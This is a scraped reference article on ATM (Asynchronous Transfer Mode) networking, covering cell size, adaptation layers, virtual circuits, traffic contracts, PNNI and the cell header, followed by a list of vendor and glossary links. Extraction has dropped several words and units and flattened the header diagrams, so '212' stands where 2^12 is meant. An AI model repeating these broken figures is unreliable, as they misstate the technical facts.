The motivation for the use of small data cells was the reduction of (delay variance, in this case) in the multiplexing of data streams; reduction of this (and also end-to-end round-trip delays) is particularly important when carrying voice traffic.
This is because the conversion of digitized voice back into an analog audio signal is an inherently process, and to do a good job, the that does this needs an evenly spaced (in time) stream of data items. If the next data item is not available when it is needed, the codec has no choice but to produce silence - and if the data does arrive, but late, it is useless, because the time period when it should have been converted to a signal has already passed.
Now consider a speech signal reduced to packets, and forced to share a link with bursty data traffic (i.e. some of the data packets will be large). No matter how small the speech packets could be made, they would always encounter full-size data packets, and under normal queuing conditions, might experience maximum queuing delays.
At the time ATM was designed, 155 Mbit/s (135 Mbit/s payload) was considered a fast optical network link, and many links in the digital network were considerably slower, ranging from 1.544 to 45 Mbit/s in the USA (2 to 34 Mbit/s in Europe).
At this rate, a typical full-length 1500 byte (12000 bit) data packet would take 89 to transmit. In a lower-speed link, such as a 1.544 Mbit/s T1 link, a 1500 byte packet would take up to 7.8 milliseconds.
A queueing delay induced by several such data packets might be several times the figure of 7.8 ms, in addition to any packet generation delay in the shorter speech packet. This was clearly unacceptable for speech traffic, which needs to have low jitter in the data stream being fed into the codec if it is to produce good-quality sound. A packet voice system can produce this in one of two ways:
  • Have a playback buffer between the network and the codec, one large enough to tide the codec over almost all the jitter in the data. This allows smoothing out the jitter, but the delay introduced by passage through the buffer would be such that echo cancellers would be required even in local networks; this was considered too expensive at the time. Also, it would have increased the delay across the channel, and human conversational mechanisms tend not to work well with high-delay channels.
  • Build a system which can inherently provide low jitter (and low overall delay) to traffic which needs it.
  • Operate on a 1:1 user basis (i.e., a dedicated pipe).
The latter was the solution adopted by ATM. However, to be able to provide short queueing delays, but also be able to carry large datagrams, it had to have cells. ATM broke all packets, data and voice streams up into 48-byte chunks, adding a 5-byte routing header to each one so that they could be reassembled later. It multiplexed these 53-byte cells instead of packets. Doing so reduced the worst-case queuing jitter by a factor of almost 30, removing the need for echo cancellers.

Cells In Practice

The rules for segmenting and reassembling packets and streams into cells are known as . The most important two are AAL 1, used for streams, and , used for most types of packets. Which AAL is in use for a given cell is not encoded in the cell. Instead, it is negotiated by or configured at the endpoints on a per-virtual-connection basis.
Since ATM was designed, networks have become much faster. As of 2001, a 1500 byte (12000 bit) full-size Ethernet packet will take only 1.2 µs to transmit on a 10 Gbit/s optical network, removing the need for small cells to reduce jitter. Some consider that this removes the need for ATM in the network backbone. Additionally, the hardware for implementing the service adaptation for IP packets is expensive at very high speeds. Specifically, the cost of segmentation and reassembly (SAR) hardware at and above speeds makes ATM less competitive for IP than (POS). SAR performance limits mean that the fastest IP router ATM interfaces are OC12 - OC48 (STM4 - STM16), while (as of 2004) POS can operate at OC-192 (STM64) with higher speeds expected in the future.
On slow links (2 Mbit/s and below) ATM still makes sense, and this is why so many ADSL systems use ATM as an intermediate layer between the physical link layer and a Layer 2 protocol like PPP or Ethernet.
At these lower speeds, ATM's ability to carry multiple logical circuits on a single physical or virtual medium provides a compelling business advantage. DSL can be used as an access method for an ATM network, allowing a DSL termination point in a telephone central office to connect to many internet service providers across a wide-area ATM network. In the United States, at least, this has allowed DSL providers to provide DSL access to the customers of many internet service providers. Since one DSL termination point can support multiple ISPs, the economic feasibility of DSL is substantially improved.

Why Virtual Circuits?

ATM is a channel based transport layer. This is encompassed in the concept of the Virtual Path (VP) and Virtual Circuit (VC). Every ATM cell has an 8- or 12-bit Virtual Path Identifier (VPI) and 16-bit Virtual Circuit Identifer (VCI) pair defined in its header. The length of the VPI varies according to whether the cell is sent on the user-network interface (on the edge of the network), or if it is sent on the network-network interface (inside the network).
As these cells traverse an ATM network, switching is achieved by changing the VPI/VCI values. Although the VPI/VCI values are not necessarily consistent from one end of the connection to the other, the concept of a circuit is consistent (unlike IP, where any given packet could get to its destination by a different route than the others).
Another advantage of the use of virtual circuits is the ability to use them as a multiplexing layer, allowing different services (such as voice, , n*64 channels, IP, , etc.) to share a common ATM connection without interfering with one another.

Using Cells and Virtual Circuits For Traffic Engineering

Another key ATM concept is that of the traffic contract. When an ATM circuit is set up each switch is informed of the traffic class of the connection.
ATM traffic contracts are part of the mechanism by which "" (QoS) is ensured. There are three basic types (and several variants) which each have a set of parameters describing the connection.
  • CBR - Constant bit rate: you specify a Peak Cell Rate (PCR) which is what you get
  • VBR - Variable bit rate: you specify an average cell rate which can peak at a certain level for a maximum time.
  • ABR - Available bit rate: you specify a minimum rate which is guaranteed
  • UBR - Unspecified bit rate: you get whatever is left after all other traffic has had its bandwidth
VBR has and non-real-time variants and is used for "bursty" traffic.
Most traffic classes also introduce the concept of Cell Delay Variation Time (CDVT) which defines the "clumping" of cells in time.
Traffic contracts are usually maintained by the use of "Shaping", a combination of queuing and marking of cells, and enforced by "Policing".

Traffic Shaping

is usually done at the entry point to an ATM network and attempts to ensure that the cell flow will meet its traffic contract.

Traffic Policing

To maintain network performance it is possible to police virtual circuits against their traffic contracts. If a circuit is exceeding its traffic contract the network can either drop the cells or mark the Cell Loss Priority (CLP) bit, to identify a cell as discardable further down the line. Basic policing works on a cell by cell basis but this is sub-optimal for encapsulated packet traffic as discarding a single cell will invalidate the whole packet anyway. As a result schemes such as Partial Packet Discard (PPD) and Early Packet Discard (EPD) have been created that will discard a whole series of cells until the next frame starts. This reduces the number of redundant cells in the network saving bandwidth for full frames. EPD and PPD work with AAL5 connections as they use the frame end bit to detect the end of packets.

Types of Virtual Circuits and Paths

Virtual circuits and virtual paths can be built statically or dynamically. Static circuits (permanent virtual circuits or PVCs) or paths (permanent virtual paths or PVPs) require that the provisioner must build the circuit as a series of segments, one for each pair of interfaces through which it passes.
PVPs and PVCs are conceptually simple, but require significant effort in large networks. They also do not support the re-routing of service in the event of a failure. Dynamically built PVPs (soft PVPs or SPVPs) and PVCs (soft PVCs or SPVCs), in contrast, are built by specifying the characteristics of the circuit (the service "contract") and the two endpoints.
Finally, switched virtual circuits (SVCs) are built and torn down on demand when requested by an end piece of equipment. One application for SVCs is to carry individual telephone calls when a network of telephone switches are inter-connected by ATM. SVCs were also used in attempts to replace local area networks with ATM.

Virtual Circuit Routing and Call Admission

Most ATM networks supporting SPVPs, SPVCs, and SVCs use the Private Network Node Interface or Private Network-to-Network Interface (PNNI) protocol. PNNI uses the same shortest path first algorithm used by and to route IP packets to share topology information between switches and select a route through a network. PNNI also includes a very powerful summarization mechanism to allow construction of very large networks, as well as a call admission control (CAC) algorithm that determines whether sufficient bandwidth is available on a proposed route through a network to satisfy the service requirements of a VC or VP.

Structure of An ATM Cell

An ATM cell consists of a 5 byte header and a 48 byte payload. The payload size of 48 bytes was a compromise between the needs of voice telephony and packet networks, obtained by a simple averaging of the US proposal of 64 bytes and European proposal of 32, said by some to be motivated by a European desire not to need echo-cancellers on national trunks.
ATM defines two different cell formats: NNI (Network-network interface) and UNI (User-network interface). Most ATM links use UNI cell format.
Diagram of the UNI ATM Cell
7

43

0
GFCVPI
VPIVCI
VCI
VCIPTCLP
HEC




Payload (48 bytes)


Diagram of the NNI ATM Cell
7

43

0
VPI
VPIVCI
VCI
VCIPTCLP
HEC




Payload (48 bytes)



GFC = Generic Flow Control (4 bits) (default: 4-zero bits)
VPI = Virtual Path Identifier (8 bits UNI) or (12 bits NNI)
VCI = Virtual Channel Identifier (16 bits)
PT = Payload Type (3 bits)
CLP = Cell Loss Priority (1 bit)
HEC = (8bits) (checksum of header only)
The PT field is used to designate various special kinds of cells for Operation and Management (OAM) purposes, and to delineate packet boundaries in some AALs.
Several of ATM's link protocols use the HEC field to drive a algorithm which allows the position of the ATM cells to be found with no overhead required beyond what is otherwise needed for header protection.
In a UNI cell the GFC field is reserved for an (as yet undefined) local flow control/submultiplexing system between network and user. All four GFC bits must be zero by default.
The NNI cell format is almost identical to the UNI format, except that the 4 bit GFC field is re-allocated to the VPI field, extending the VPI to 12 bits. Thus, a single NNI ATM interconnection is capable of addressing almost 212 VPs of up to almost 212 VCs each (in practice some of the VP and VC numbers are reserved).



LANE (LAN Emulation)
MPOA (Multiprotocol over ATM)
PNNI (Private Network-Network Interface)
IP Over ATM
Frame Relay and ATM, FUNI, DXI, etc.
Voice and Telephony Over ATM (VTOA)
Cells in Frames (CIF)
ATM Inverse Multiplexing
ATM over ADSL
ATM Testing
ATM Products, Components, and Software
Related Information
FAQs
Cell Relay FAQ - Table of Contents
Useful FAQ especially TOPIC D - ATM Technology Questions.

Acronyms

For short explanation of acronyms use:

ATM Lexicon from 3Com
TheATMForum Acronym Handbook
ATM/CellRelayAcronyms
List of Acronyms from FORE

For longer definitions use:

Network Glossary from Cell Relay
Glossary of Terms from FORE

General Telecommunications - provides both acronyms and definitions

The Telecommunications Library

Switch Manufacturers

3Com
HomePage
Main ATM Page
ATM Products
White Papers

Adtech, Inc.
HomePage
ATM Products

Agile Networks (Lucent subsidiary)
HomePage
ATM Products and Solutions
Lucent HomePage

Alcatel
HomePage
ATM Products

ATML (Advanced Telecommunications Modules Ltd.)
HomePage
ATML Products

Cabletron
HomePage
Main ATM Page

Cascade Communications Corp.
HomePage
ATM Products

Cisco
HomePage
ATM Solutions

Digital Equipment Corporation
HomePage
ATMswitch 900 Family

FORE Systems
HomePage
ATM Switches

General DataComm
HomePage
ATM Products

Hewlett Packard
HP Networking
ATM Switching

Lucent Technologies
Home Page

NEC
HomePage
ATM Switch

Nortel
HomePage
ATM switching

Olivetti Research Lab
HomePage
ATM switches

Siemens
Networks HomePage
Broadband Products

Tellabs, Inc.
HomePage